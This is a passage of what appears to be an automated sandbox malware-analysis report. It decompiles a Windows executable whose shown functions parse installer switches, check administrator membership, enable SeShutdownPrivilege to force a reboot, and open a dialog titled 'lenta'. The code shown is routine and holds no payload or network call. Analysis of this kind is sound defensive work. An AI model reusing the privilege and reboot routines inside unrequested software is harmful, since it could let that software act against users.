									E000744B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x79124 = E00076285();
									_t75 = 0;
								}
								return E00076CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E000744B9(0, 0x521, 0x71140, 0, 0x40, 0);
												_t85 =  *0x78588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0007667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0007667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00075C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00071680(0x78c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0007667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0007667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x78a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00075C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x78b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x78a3a;
																}
																E00071680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0007658A(_t218, 0x104, 0x71140);
																if(E000731E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x78a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x78a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x78a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x78a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x78a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x79a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x79a2c =  *0x79a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x78d48 =  *0x78d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x79a2c =  *0x79a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x79a2c =  *0x79a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x78d48 =  *0x78d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x79a2c =  *0x79a2c | 0x00000004;
																										L70:
																										 *0x78a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x79a2c = 3;
																	 *0x78a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x78a2c != 0 &&  *0x78b3e == 0) {
						if(GetModuleFileNameA( *0x79a3c, 0x78b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E000766C8(0x78b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x00075c9e
0x00075ca9
0x00075cb0
0x00075cb3
0x00075cb6
0x00075cb7
0x00075cb8
0x00075cbd
0x00076204
0x00075ccb
0x00000000
0x00075ccb
0x00075cd3
0x00075cd7
0x00075cf4
0x00000000
0x00075cf4
0x00075cf8
0x00075d00
0x00000000
0x00075d06
0x00075d06
0x00075d0e
0x00075d10
0x00075d12
0x00075d14
0x00075d15
0x00075d17
0x00075d49
0x00000000
0x00000000
0x00000000
0x00000000
0x00075d19
0x00075d19
0x00075d1d
0x00000000
0x00075d3f
0x00075d3f
0x00075d4b
0x00075d4b
0x00075d4f
0x00075d8d
0x00000000
0x00075d93
0x00075d93
0x00075d9a
0x00075d9d
0x00075d9e
0x00000000
0x00075d9e
0x00075d51
0x00075d5b
0x00075d72
0x000760fb
0x000760fb
0x00076207
0x0007620a
0x0007620b
0x0007620e
0x00076217
0x00075d78
0x00075d78
0x00075d80
0x00075d83
0x00075d84
0x00000000
0x00075d84
0x00075d5d
0x00075d5f
0x00075d62
0x00075d68
0x00075d64
0x00075d64
0x00075d64
0x00000000
0x00075d62
0x00075d5b
0x00075d4f
0x00075d1d
0x00000000
0x00075d9f
0x00075d9f
0x00075da5
0x00075dab
0x00075dba
0x00076218
0x0007621d
0x00076220
0x00076221
0x00076229
0x00076230
0x00076247
0x0007626a
0x00076272
0x00076249
0x00076255
0x0007625f
0x00076264
0x00076264
0x00076284
0x00075dc0
0x00075dc0
0x00075dca
0x00075e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00075dcc
0x00075dce
0x00075e24
0x00075e24
0x00075e2c
0x00075e47
0x00075e4a
0x000761d2
0x000761e2
0x000761e7
0x000761ee
0x000761f1
0x000761f1
0x000761f8
0x000761f8
0x00075e50
0x00075e53
0x00076109
0x0007611f
0x00000000
0x00076125
0x00076137
0x0007613a
0x0007613c
0x0007613e
0x0007613e
0x00076141
0x00076141
0x00076143
0x00076144
0x0007614a
0x00000000
0x00076150
0x00076152
0x0007615c
0x00076170
0x00076172
0x0007617c
0x00076190
0x00076190
0x00076196
0x000761a5
0x00000000
0x000761ab
0x000761b9
0x000761c6
0x000761c6
0x0007617e
0x00076180
0x0007618a
0x00000000
0x00000000
0x00000000
0x00000000
0x0007618a
0x0007615e
0x00076160
0x0007616a
0x00000000
0x00000000
0x00000000
0x00000000
0x0007616a
0x0007615c
0x0007614a
0x0007610b
0x0007610e
0x0007610e
0x00000000
0x00075e59
0x00075e59
0x00075e5c
0x0007604f
0x00076056
0x00000000
0x0007605c
0x0007606e
0x00076071
0x00076073
0x00076075
0x00076075
0x00076078
0x00076078
0x0007607a
0x0007607b
0x00076081
0x00000000
0x00076087
0x00076087
0x0007608d
0x0007609c
0x00000000
0x000760a2
0x000760aa
0x000760b2
0x000760b7
0x000760bd
0x000760bf
0x000760bf
0x000760d6
0x000760e0
0x000760e7
0x000760f5
0x00000000
0x00000000
0x00000000
0x00000000
0x000760f5
0x0007609c
0x00076081
0x00075e62
0x00075e62
0x00075e65
0x00075fd3
0x00075fe9
0x00000000
0x00075fef
0x00075fef
0x00075ff7
0x00075ffd
0x00076003
0x00076006
0x00076011
0x00076014
0x0007603d
0x00076016
0x00076018
0x00076019
0x0007601b
0x00076033
0x0007601d
0x00076020
0x00076029
0x00076022
0x00076022
0x00076022
0x00076020
0x0007601b
0x00076042
0x00076044
0x00076046
0x0007604a
0x00075ff7
0x00075fd5
0x00075fd8
0x00075fd8
0x00000000
0x00075e6b
0x00075e6b
0x00075e6e
0x00075f8b
0x00075f99
0x00000000
0x00075f9f
0x00075fa7
0x00075faf
0x00000000
0x00075fb1
0x00075fb3
0x00000000
0x00075fb5
0x00075fb7
0x00000000
0x00075fb9
0x00000000
0x00075fb9
0x00075fb7
0x00075fb3
0x00075faf
0x00075f8d
0x00075f8d
0x00075f8d
0x00075f8f
0x00075fc1
0x00075fc1
0x00075fc1
0x00000000
0x00075e74
0x00075e74
0x00075e77
0x00075ea0
0x00075ebd
0x00075f79
0x00000000
0x00075f7f
0x00075ec3
0x00075ec3
0x00075ecc
0x00075ed4
0x00075ed6
0x00075edc
0x00075edf
0x00075eea
0x00075eed
0x00075f3f
0x00075f40
0x00000000
0x00075eef
0x00075eef
0x00075ef2
0x00075f34
0x00075ef4
0x00075ef4
0x00075ef7
0x00075f2b
0x00000000
0x00075ef9
0x00075ef9
0x00075efc
0x00075f22
0x00000000
0x00075efe
0x00075eff
0x00075f02
0x00075f16
0x00075f04
0x00075f07
0x00075f0d
0x00075f46
0x00075f46
0x00075f09
0x00075f09
0x00075f09
0x00075f07
0x00075f02
0x00075efc
0x00075ef7
0x00075ef2
0x00075f4c
0x00075f4e
0x00075f50
0x00075f54
0x00075ed4
0x00075ea2
0x00075ea4
0x00075eaf
0x00075eaf
0x00000000
0x00075e79
0x00075e7d
0x00000000
0x00075e83
0x00075e83
0x00075e83
0x00075e85
0x00075e85
0x00075e8e
0x00000000
0x00075e94
0x00000000
0x00075e94
0x00075e8e
0x00075e7d
0x00075e77
0x00075e6e
0x00075e65
0x00075e5c
0x00000000
0x00000000
0x00000000
0x00075dd0
0x00075dd0
0x00075dd0
0x00000000
0x00075dd0
0x00075dce
0x00075dca
0x00075dba
0x00000000
0x00075d00
0x00075dd9
0x00075e04
0x000761fe
0x00075e0a
0x00075e0c
0x00075e17
0x00075e17
0x00075e04
0x00076200
0x00076200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00075CEE
GetModuleFileNameA.KERNEL32(00078B3E,00000104,00000000,?,?), ref: 00075DFC
CharUpperA.USER32(?), ref: 00075E3E
CharUpperA.USER32(-00000052), ref: 00075EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00075F6F
CharUpperA.USER32(?), ref: 00075FA7
CharUpperA.USER32(-0000004E), ref: 00076008
CharUpperA.USER32(?), ref: 000760AA
CloseHandle.KERNEL32(00000000,00071140,00000000,00000040,00000000), ref: 000761F1
ExitProcess.KERNEL32 ref: 000761F8

Strings

:, xrefs: 00076118
", xrefs: 00075D78
RegServer, xrefs: 00075F66
", xrefs: 0007612D

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 05ba36e6ac8dc155307e676788cb8e3953067c53a2550d276c955060005e8bb1
Instruction ID: 9401c5bf9099d54dca98d41853ce5dfd50e9f4bc9eea88954766c4ce04b48999
Opcode Fuzzy Hash: 05ba36e6ac8dc155307e676788cb8e3953067c53a2550d276c955060005e8bb1
Instruction Fuzzy Hash: 5DD12A71E44E445EEBB58B388C483FA37E1A756302F14C0A9C48ED6191DAFD4EC28B4D

Uniqueness

Uniqueness Score: -1.00%

Function 000718A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E000718A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x78004; // 0xdaa0d862
				_v8 = _t23 ^ _t53;
				_t25 =  *0x78128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00076CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E000717EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x78128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x78128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x000718a3
0x000718a3
0x000718ab
0x000718b2
0x000718b5
0x000718be
0x000718c0
0x000718c6
0x000718c7
0x000718ca
0x000718cf
0x000719c9
0x000719d8
0x000719d8
0x000718df
0x000719b8
0x000719bd
0x000719bf
0x000719bf
0x00000000
0x000719bd
0x000718fa
0x00000000
0x00000000
0x00071912
0x000719aa
0x000719ad
0x000719b3
0x00000000
0x00071927
0x00071927
0x00071932
0x00071936
0x000719a9
0x000719a9
0x00000000
0x000719a9
0x0007194c
0x000719a2
0x000719a3
0x00000000
0x0007196e
0x00071970
0x00071999
0x0007199c
0x00000000
0x0007199c
0x00071972
0x00071972
0x00071975
0x00071984
0x00071985
0x0007198a
0x00000000
0x00000000
0x00000000
0x0007198c
0x00071991
0x00071996
0x00000000
0x00071996
0x0007194c

APIs

Part of subcall function 000717EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000718DD), ref: 0007181A
Part of subcall function 000717EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0007182C
Part of subcall function 000717EE: AllocateAndInitializeSid.ADVAPI32(000718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000718DD), ref: 00071855
Part of subcall function 000717EE: FreeSid.ADVAPI32(?,?,?,?,000718DD), ref: 00071883
Part of subcall function 000717EE: FreeLibrary.KERNEL32(00000000,?,?,?,000718DD), ref: 0007188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 000718EB
OpenProcessToken.ADVAPI32(00000000), ref: 000718F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0007190A
GetLastError.KERNEL32 ref: 00071918
LocalAlloc.KERNEL32(00000000,?,?), ref: 0007192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00071944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00071964
EqualSid.ADVAPI32(00000004,?), ref: 0007197A
FreeSid.ADVAPI32(?), ref: 0007199C
LocalFree.KERNEL32(00000000), ref: 000719A3
CloseHandle.KERNEL32(?), ref: 000719AD

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 8d268279ae0b13c1230b89abd706ed414b86696bbfe9c4ff3f9566ed586375cc
Instruction ID: f394330b74e67b0a4c865a11adaf3be8ce45f0bb61ec789b930b12d8f844588d
Opcode Fuzzy Hash: 8d268279ae0b13c1230b89abd706ed414b86696bbfe9c4ff3f9566ed586375cc
Instruction Fuzzy Hash: 2C311271E00209AFEB509FA9DC58AEF7BBCFF45700F108415E649E2190D73D9945CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00071F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00071F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x79a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x78004; // 0xdaa0d862
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E000744B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00076CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E000744B9(0, 0x522, 0x71140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00071EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x00071f90
0x00071f90
0x00071f93
0x00071f98
0x00071fa4
0x00071fa7
0x00071fc5
0x00071fcd
0x00071fdb
0x00071ee5
0x00071eea
0x00071ef1
0x00071ef4
0x00071f0c
0x00071f2e
0x00071f3a
0x00071f46
0x00071f4d
0x00071f58
0x00071f60
0x00071f61
0x00071f62
0x00071f75
0x00071f80
0x00071f77
0x00071f77
0x00000000
0x00071f77
0x00071f64
0x00071f64
0x00000000
0x00071f64
0x00071f0e
0x00071f0e
0x00071f13
0x00071f13
0x00071f14
0x00071f14
0x00071f16
0x00071f17
0x00071f1a
0x00071f1f
0x00071f1f
0x00071f86
0x00071f8f
0x00071fcf
0x00071fd3
0x00000000
0x00071fd3
0x00071fa9
0x00071fb4
0x00071fbb
0x00071fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00071fc3
0x00071f9a
0x00071f9a
0x00071fa2
0x00071fd9
0x00071fda
0x00000000
0x00000000
0x00000000
0x00071fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00071EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00071F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00071FD3

Strings

SeShutdownPrivilege, xrefs: 00071F28

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: 3de55eface191821c81d49967d53a8e6a3aa5aff274d1c4a56f58da9e0f6ba7c
Instruction ID: be8e0f16b794ee8ca1d255b0d0555a7fc50c0a3ac778b5c2ac485650fbda1f03
Opcode Fuzzy Hash: 3de55eface191821c81d49967d53a8e6a3aa5aff274d1c4a56f58da9e0f6ba7c
Instruction Fuzzy Hash: 1821DB71F4020576EB305BA99C49FFF76B8EBC6711F108428FA0DE61C1D77D88419269

Uniqueness

Uniqueness Score: -1.00%

Function 00077155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00077155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x78004; // 0xdaa0d862
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x78004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x78004 = _t39;
				}
				_t37 =  !_t36;
				 *0x78008 = _t37;
				return _t37;
			}

0x0007715d
0x00077161
0x00077165
0x00077178
0x00077182
0x0007718e
0x00077197
0x000771a0
0x000771b1
0x000771b8
0x000771c4
0x000771c7
0x000771cb
0x000771d5
0x000771da
0x000771da
0x000771dc
0x000771dc
0x000771e2
0x000771e5
0x000771ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00077182
GetCurrentProcessId.KERNEL32 ref: 00077191
GetCurrentThreadId.KERNEL32 ref: 0007719A
GetTickCount.KERNEL32 ref: 000771A3
QueryPerformanceCounter.KERNEL32(?), ref: 000771B8

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 7ee1eaeb9b92564e6cfdac8649a5ec797e57b7154cdf3ac69a5d52f2db54aed0
Instruction ID: 5ee953d48431efa9621df9c998e12a1f8220100f791f113c69c7bfe84e6ec37d
Opcode Fuzzy Hash: 7ee1eaeb9b92564e6cfdac8649a5ec797e57b7154cdf3ac69a5d52f2db54aed0
Instruction Fuzzy Hash: 73111F71E05208DFEB50DFB8DA4869EB7F4EF49315F918465D809E7210DA3C9A44CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00076CF0 Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00076CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00076cf7
0x00076d00
0x00076d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00076E26,00071000), ref: 00076CF7
UnhandledExceptionFilter.KERNEL32(00076E26,?,00076E26,00071000), ref: 00076D00
GetCurrentProcess.KERNEL32(C0000409,?,00076E26,00071000), ref: 00076D0B
TerminateProcess.KERNEL32(00000000,?,00076E26,00071000), ref: 00076D12

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: e101a1e3bd1d9492d3d644964d3572555a1e1cf82691098618a223d46d6f5435
Instruction ID: d31e842ebe437e7cd96095ce5a62cd2fee2f52161bca420c59d97237e4f8cf0b
Opcode Fuzzy Hash: e101a1e3bd1d9492d3d644964d3572555a1e1cf82691098618a223d46d6f5435
Instruction Fuzzy Hash: 05D0C932A00108BBFB002BE1EC0CA5D3F28EBCA222F844000F31DA2420CA3E5491CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00073210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00073210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E000743D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lenta");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
